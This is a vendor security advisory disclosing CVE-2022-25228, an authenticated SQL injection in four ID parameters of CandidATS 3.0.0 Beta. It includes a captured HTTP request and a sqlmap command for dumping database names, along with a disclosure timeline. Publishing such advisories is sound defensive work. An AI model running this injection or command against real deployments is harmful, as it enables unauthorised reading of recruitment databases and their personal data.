

Advisories

CandidATS 3.0.0 - Authenticated SQL Injection

6,3

Medium

Discovered by

Oscar Uribe

Offensive Team, Fluid Attacks

Summary

Full name

CandidATS 3.0.0 - Authenticated SQL Injection

Code name

Jackson

State

Public

Release date

19 de jul. de 2022

Affected product

CandidATS

Affected version(s)

Version 3.0.0 Beta (Pilava Beta)

Vulnerability name

SQL injection

Vulnerability type

146. SQL injection

Remotely exploitable

Yes

CVSS v3.1 vector string

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

CVSS v3.1 base score

6.3

Exploit available

CVE ID(s)

CVE-2022-25228

Description

CandidATS Version 3.0.0 Beta allows an authenticated user to inject SQL queries in /index.php?m=settings&a=show via the userID parameter, in /index.php?m=candidates&a=show via the candidateID, in /index.php?m=joborders&a=show via the jobOrderID and /index.php?m=companies&a=show via the companyID parameter

Proof of Concept

Log in to CandidATS with a user who has permissions to read job orders, candidates or companies.
Go to index.php?m=joborders (or any of the option above).
Uncheck the Only My Companies option.
Select any of the items listed and intercept the request with BurpSuite.
It is possible to inject sql sentences inside the companyID parameter, for example, the following request will make the database sleep for 5 seconds.

Save the intercepted request into a file.

GET /candidATS/index.php?m=companies&a=show&companyID=2 HTTP/1.1
Host: 172.16.28.136
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*

Run the following command from sqlmap in order to extract information from the database.
sqlmap -r companyId.req -p companyID --dbs --batch

Exploit

It is possible to use sqlmap in order to extract information from the database

Mitigation

This information will be released later according to our Responsible Disclosure Policy.

References

Vendor page https://candidats.net/forums/

Timeline



Vulnerability discovered

19 de abr. de 2022



Vendor contacted

19 de abr. de 2022



Vendor replied

20 de abr. de 2022



Vendor confirmed

20 de abr. de 2022



Public disclosure

19 de jul. de 2022

Comece seu teste gratuito de 21 dias

Descubra os benefícios de nossa solução de Hacking Contínuo, da qual empresas de todos os tamanhos já desfrutam.

Teste gratuito

Contatar vendas

Comece seu teste gratuito de 21 dias

Descubra os benefícios de nossa solução de Hacking Contínuo, da qual empresas de todos os tamanhos já desfrutam.

Teste gratuito

Contatar vendas

Comece seu teste gratuito de 21 dias

Descubra os benefícios de nossa solução de Hacking Contínuo, da qual empresas de todos os tamanhos já desfrutam.

Teste gratuito

Contatar vendas

Solução

Planos

Recursos

Advisories

Empresa

Select Language



Contatar vendas

Fazer login

Teste gratuito

Select Language



Contatar vendas

Teste gratuito

Solução

Planos

Recursos

Advisories

Empresa

Select Language



Contatar vendas

Fazer login

Teste gratuito

Select Language



As soluções da Fluid Attacks permitem que as organizações identifiquem, priorizem e corrijam vulnerabilidades em seus softwares ao longo do SDLC. Com o apoio de IA, ferramentas automatizadas e pentesters, a Fluid Attacks acelera a mitigação da exposição ao risco das empresas e fortalece sua postura de cibersegurança.